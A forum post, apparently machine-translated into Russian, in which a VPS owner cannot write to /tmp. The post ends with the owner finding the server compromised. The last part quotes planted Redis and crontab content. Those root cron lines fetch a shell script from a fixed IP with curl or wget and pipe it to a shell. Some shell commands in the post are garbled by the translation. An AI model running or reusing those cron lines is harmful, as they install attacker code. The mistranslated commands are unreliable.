Я не могу писать в каталог /tmp.
Это как пользователь без полномочий root:
europasprak@vps-xxxxxxxx:~$ echo 'ok' > /tmp/dummy
-bash: /tmp/dummy: операция не разрешена
и
europasprak@vps-xxxxxxxx:~$ sudo echo 'ok' | sudo тройник /tmp/манекен
tee: /tmp/dummy: операция не разрешена
А также пользователь root:
root@vps-xxxxxxxx:~# echo 'ok' > /tmp/dummy
bash: /tmp/dummy: операция не разрешена
Он даже отказывается, прежде чем (!) запросить судо пароль:
Последний вход: ср, 18 августа, 19:38:33 2021 с 91.168.98.130
europasprak@vps-3506b083:~$ sudo echo 'ok' > /tmp/dummy2
-bash: /tmp/dummy2: операция не разрешена
Интересно, что он отказывается устанавливать время от имени пользователя root в этой команде:
root@vps-xxxxxxxx:/home/europasprak# коснитесь /tmp/ok
touch: установка времени '/tmp/ok': нет такого файла или каталога
Проблема появилась сегодня утром.
Машина:
europasprak@vps-xxxxxxxx:~$ uname -a
Linux vps-xxxxxxxx 5.8.0-63-generic #71-Ubuntu SMP Вт, 13 июля, 15:59:12 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
Разделы:
europasprak@vps-xxxxxxxx:~$ df
Файловая система Используемые 1K-блоки Доступно Использование % Установлено на
tmpfs 795424 1072 794352 1% /запуск
/dev/sda1 162420480 59362024 103042072 37% /
tmpfs 3977116 0 3977116 0% /dev/shm
tmpfs 5120 0 5120 0% /выполнить/заблокировать
tmpfs 4096 0 4096 0% /sys/fs/cgroup
/dev/sda15 106858 8008 98851 8% /boot/efi
оверлей 162420480 59362024 103042072 37% /home/europasprak/programs/install/docker/overlay2/2f1f82255bbd13b61ea151363e46880c4902b4b822fca15078fb9a10461111df/merged
europasprak@vps-xxxxxxxx:~$ df -i
Файловая система Inodes IUsed IFree IUse% Установлено на
tmpfs 994279 640 993639 1% /запуск
/dev/sda1 20643840 523620 20120220 3% /
tmpfs 994279 4 994275 1% /dev/shm
tmpfs 994279 3 994276 1% /выполнить/заблокировать
tmpfs 1024 18 1006 2% /sys/fs/cgroup
/dev/sda15 0 0 0 - /boot/efi
Еще немного вывода:
europasprak@vps-xxxxxxxx:~$ ls -ld /tmp
drwxrwxrwt 12 root root 4096 août 18 05:45 /tmp
europasprak@vps-xxxxxxxx:~$ lsattr /tmp
--------------e----- /tmp/dump.rdb
lsattr: доступ запрещен при чтении флагов на /tmp/systemd-private-b0ce13ad416741f3ba842d3821949044-systemd-timesyncd.service-11J2sh
lsattr: Отказано в доступе при чтении флагов на /tmp/tmp.40xGrsPHCk
--------------e----- /tmp/exp_lin.so
--------------e----- /tmp/oi_plugins.php
--------------e----- /tmp/backup.db
lsattr: доступ запрещен при чтении флагов на /tmp/systemd-private-b0ce13ad416741f3ba842d3821949044-systemd-logind.service-ffm01g
lsattr: доступ запрещен при чтении флагов на /tmp/systemd-private-b0ce13ad416741f3ba842d3821949044-systemd-resolved.service-E7ECGg
--------------е----- /tmp/xm4.tgz
lsattr: Отказано в доступе при чтении флагов в /tmp/snap.lxd
ОБНОВЛЕНИЕ: я попытался установить acl но явно не получилось:
europasprak@vps-xxxxxxxx:~$ sudo apt install acl
Чтение списков пакетов... Ошибка!
E: невозможно выполнить mkstemp /tmp/clearsigned.message.VjQNL9 — GetTempFile (1: операция не разрешена)
E: Не удалось проанализировать или открыть списки пакетов или файл состояния.
europasprak@vps-xxxxxxxx:~$ sudo apt update
Ошибка: 1 http://security.ubuntu.com/ubuntu groovy-security InRelease
Временная ошибка при разрешении «security.ubuntu.com»
Ошибка: 2 https://download.docker.com/linux/ubuntu заводной InRelease
Временная ошибка при разрешении «download.docker.com»
Err:3 http://ppa.launchpad.net/ultradvorka/ppa/ubuntu заводной InRelease
Временная ошибка при разрешении «ppa.launchpad.net»
Ошибка: 4 http://nova.clouds.archive.ubuntu.com/ubuntu groovy InRelease
Временная ошибка разрешения «nova.clouds.archive.ubuntu.com»
Ошибка: 5 http://nova.clouds.archive.ubuntu.com/ubuntu groovy-updates InRelease
Временная ошибка разрешения «nova.clouds.archive.ubuntu.com»
Ошибка: 6 http://nova.clouds.archive.ubuntu.com/ubuntu groovy-backports InRelease
Временная ошибка разрешения «nova.clouds.archive.ubuntu.com»
Чтение списков пакетов... Ошибка!
W: Не удалось получить http://nova.clouds.archive.ubuntu.com/ubuntu/dists/groovy/InRelease. Временная ошибка разрешения «nova.clouds.archive.ubuntu.com»
W: Не удалось получить http://nova.clouds.archive.ubuntu.com/ubuntu/dists/groovy-updates/InRelease. Временная ошибка разрешения «nova.clouds.archive.ubuntu.com»
W: Не удалось получить http://nova.clouds.archive.ubuntu.com/ubuntu/dists/groovy-backports/InRelease. Временная ошибка разрешения «nova.clouds.archive.ubuntu.com»
W: Не удалось получить http://security.ubuntu.com/ubuntu/dists/groovy-security/InRelease. Временная ошибка при разрешении «security.ubuntu.com».
W: Не удалось получить https://download.docker.com/linux/ubuntu/dists/groovy/InRelease. Временная ошибка при разрешении «download.docker.com».
W: Не удалось получить http://ppa.launchpad.net/ultradvorka/ppa/ubuntu/dists/groovy/InRelease. Временная ошибка при разрешении «ppa.launchpad.net».
W: Не удалось загрузить некоторые индексные файлы. Их игнорировали или вместо них использовали старые.
E: невозможно mkstemp /tmp/clearsigned.message.cOHaS4 — GetTempFile (1: операция не разрешена)
E: Не удалось проанализировать или открыть списки пакетов или файл состояния.
ОБНОВЛЕНИЕ: я также пытался отключить настройку, но это не помогло:
europasprak@vps-xxxxxxxx:~$ sudo echo 'ok' > /tmp/dummy
-bash: /tmp/dummy: операция не разрешена
europasprak@vps-xxxxxxxx:~$ sudo sysctl fs.protected_regular=0
[sudo] пароль для европаспрака:
fs.protected_regular = 0
europasprak@vps-xxxxxxxx:~$ sudo echo 'ok' > /tmp/dummy
-bash: /tmp/dummy: операция не разрешена
VPS — это экземпляр kvm:
europasprak@vps-xxxxxxxx:~$ sudo virt-what
квм
ОБНОВИТЬ:
europasprak@vps-xxxxxxxx:~$ sudo journalctl --boot --priority=4
[sudo] пароль для европаспрака:
-- Журналы начинаются в четверг 01.04.2021, 18:46:32 UTC, заканчиваются в воскресенье, 22 августа 2021, 13:54:48 UTC. --
août 20 20:52:46 ядро vps-3506b083: #2
août 20 20:52:46 ядро vps-3506b083: #3
août 20 20:52:46 ядро vps-3506b083: acpi PNP0A03:00: не удалось добавить информацию MMCONFIG, невозможно получить доступ к расширенному пространству конфигурации PCI под этим мостом.
août 20 20:52:46 ядро vps-3506b083: платформа eisa.0: EISA: не удается выделить ресурсы для материнской платы
août 20 20:52:46 ядро vps-3506b083: платформа eisa.0: не удается выделить ресурсы для слота EISA 1
août 20 20:52:46 ядро vps-3506b083: платформа eisa.0: не удается выделить ресурсы для слота EISA 2
août 20 20:52:46 ядро vps-3506b083: платформа eisa.0: не удается выделить ресурсы для слота EISA 3
août 20 20:52:46 ядро vps-3506b083: платформа eisa.0: не удается выделить ресурсы для слота 4 EISA
août 20 20:52:46 ядро vps-3506b083: платформа eisa.0: не удается выделить ресурсы для слота EISA 5
août 20 20:52:46 ядро vps-3506b083: платформа eisa.0: не удается выделить ресурсы для слота EISA 6
août 20 20:52:46 ядро vps-3506b083: платформа eisa.0: не удается выделить ресурсы для слота EISA 7
août 20 20:52:46 ядро vps-3506b083: платформа eisa.0: не удается выделить ресурсы для слота EISA 8
août 20 20:52:46 ядро vps-3506b083: sd 2:0:0:0: Произошел сброс питания или устройства
août 20 20:52:46 vps-3506b083 systemd[1]: /lib/systemd/system/plymouth-start.service:17: Устройство настроено на использование KillMode=none. Это небезопасно, так как отключает>
août 20 20:52:46 vps-3506b083 systemd[1]: /lib/systemd/system/dbus.service:12: Устройство настроено на использование KillMode=none. Это небезопасно, так как отключает systemd>
août 20 20:52:46 vps-3506b083 systemd-udevd[413]: не удалось отключить WakeOnLan для ens3: операция не поддерживается
août 20 20:52:48 vps-3506b083 systemd-networkd[658]: /run/systemd/network/10-netplan-ens3.network: MTUBytes= в разделе [Link] и UseMTU= в разделе [DHCP] >
août 20 20:52:50 vps-3506b083 cron[702]: Ошибка: плохая минута; при чтении /etc/crontab
août 20 20:52:50 vps-3506b083 cron[702]: Ошибка: плохая минута; при чтении /etc/cron.d/zzh
août 20 20:52:50 vps-3506b083 cron[702]: Ошибка: плохая минута; при чтении /etc/cron.d/dog
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: получен сосед по ссылке '3', о которой мы не знаем, игнорируем.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: получен сосед по ссылке '3', о которой мы не знаем, игнорируем.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: получен сосед по ссылке '3', о которой мы не знаем, игнорируем.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: получен сосед по ссылке '3', о которой мы не знаем, игнорируем.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: получен сосед по ссылке '4' о которой мы не знаем, игнорируем.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: получен сосед по ссылке '4' о которой мы не знаем, игнорируем.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: получен сосед по ссылке '4' о которой мы не знаем, игнорируем.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: получен сосед по ссылке '4' о которой мы не знаем, игнорируем.
août 20 20:52:53 vps-3506b083 systemd-udevd[417]: testvxlan: не удалось получить конфигурацию ссылки: нет такого устройства
août 20 20:52:53 vps-3506b083 systemd-udevd[417]: vx-001000-z6tjy: не удалось получить конфигурацию ссылки: нет такого устройства
août 20 20:52:53 vps-3506b083 systemd-udevd[413]: vethe97279b: не удалось сгенерировать постоянный MAC-адрес: нет доступных данных
août 20 20:52:53 vps-3506b083 systemd-udevd[417]: vethe514997: не удалось сгенерировать постоянный MAC-адрес: нет доступных данных
août 20 20:52:53 vps-3506b083 systemd-networkd[658]: vethe97279b: не удалось дождаться инициализации интерфейса: нет такого устройства
европаспрак@vps-3506b083:~$
ОБНОВЛЕНИЕ: я вижу, что мой файл /etc/crontab был изменен. Моя система взломана. Как ни странно, никакой деятельности по добыче полезных ископаемых не ведется. Я думаю, что мне нужно сделать полную переустановку системы.
REDIS0006þ^@^@^Gbackup3Ã@Q@X^G
*/4 *Â ^A^_root curl -fsSL http://199.19.22^T6.117/b2f628fff19fda9Ã^@^K/b.sh | ш
^@^Gbackup1@F
*/2 * * * * root cd1 -fsSL http://199.19.226.117/b2f628/b.sh | ш
^@^Gbackup4Ã@Q@X^G
*/5 *Â ^A^_root wd1 -q -O- http://199.19.22^T6.117/b2f628fff19fda9Ã^@^K/b.sh | ш
^@^Gbackup2@H
*/3 * * * * root wget -q -O- http://199.19.226.117/b2f628/b.sh | ш
ÿWìðr<90><93>^Gæ
